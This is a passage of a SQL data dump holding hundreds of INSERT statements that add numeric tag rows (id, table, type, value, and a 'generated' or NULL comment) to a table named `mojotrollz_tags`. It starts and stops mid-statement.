1, 489, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179917, 2, 2, 3277, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179917, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179917, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179918, 2, 1, 489, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179918, 2, 2, 3277, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179918, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179918, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179919, 2, 1, 489, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179919, 2, 2, 3277, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179919, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179919, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179920, 2, 1, 489, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179920, 2, 2, 3277, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179920, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179920, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179921, 2, 1, 489, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179921, 2, 2, 3277, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179921, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179921, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179922, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179924, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179964, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179965, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179967, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179968, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179969, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179970, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179972, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179973, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179975, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179976, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179977, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179984, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179985, 2, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179985, 2, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179985, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179985, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180005, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180006, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180007, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180024, 2, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180024, 2, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180025, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180026, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180029, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180030, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180031, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180032, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180034, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180035, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180036, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180037, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180038, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180039, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180040, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180041, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180042, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180043, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180044, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180045, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180046, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180047, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180048, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180049, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180050, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180051, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180052, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180053, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180055, 2, 1, 43, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180055, 2, 2, 718, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180056, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180057, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180058, 2, 1, 529, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180058, 2, 2, 3358, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180058, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180058, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180059, 2, 1, 529, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180059, 2, 2, 3358, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180059, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180059, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180060, 2, 1, 529, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180060, 2, 2, 3358, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180060, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180060, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180061, 2, 1, 529, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180061, 2, 2, 3358, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180061, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180061, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180087, 2, 1, 529, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180087, 2, 2, 3358, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180087, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180087, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180088, 2, 1, 529, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180088, 2, 2, 3358, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180088, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180088, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180089, 2, 1, 529, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180089, 2, 2, 3358, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180089, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180089, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180090, 2, 1, 529, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180090, 2, 2, 3358, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180090, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180090, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180091, 2, 1, 529, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180091, 2, 2, 3358, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180091, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180091, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180100, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180101, 2, 1, 529, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180101, 2, 2, 3358, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180101, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180101, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180102, 2, 1, 529, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180102, 2, 2, 3358, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180102, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180102, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180104, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180105, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180164, 2, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180164, 2, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180164, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180164, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180165, 2, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180165, 2, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180165, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180165, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180166, 2, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180166, 2, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180166, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180166, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180167, 2, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180167, 2, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180167, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180167, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180168, 2, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180168, 2, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180168, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180168, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180184, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180215, 2, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180215, 2, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180215, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180215, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180216, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180217, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180228, 2, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180228, 2, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180228, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180228, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180229, 2, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180229, 2, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180229, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180229, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180244, 2, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180244, 2, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180244, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180244, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180247, 2, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180247, 2, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180247, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180247, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180248, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180252, 2, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180252, 2, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180252, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180252, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180255, 2, 1, 529, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180255, 2, 2, 3358, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180255, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180255, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180256, 2, 1, 529, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180256, 2, 2, 3358, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180256, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180256, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180323, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180324, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180325, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180326, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180327, 2, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180327, 2, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180327, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180327, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180328, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180329, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180330, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180331, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180332, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180333, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180334, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180335, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180337, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180338, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180339, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180340, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180341, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180342, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180345, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180347, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180348, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180349, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180350, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180351, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180352, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180353, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180358, 2, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180358, 2, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180358, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180358, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180364, 2, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180364, 2, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180364, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180364, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180365, 2, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180365, 2, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180365, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180365, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180366, 2, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180366, 2, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180366, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180366, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180367, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180368, 2, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180368, 2, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180368, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180368, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180369, 2, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180369, 2, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180369, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180369, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180370, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180371, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180372, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180373, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180374, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180386, 2, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180386, 2, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180386, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180386, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180392, 2, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180392, 2, 2, 19, NULL); INSERT INTO `mojotrollz_tags` 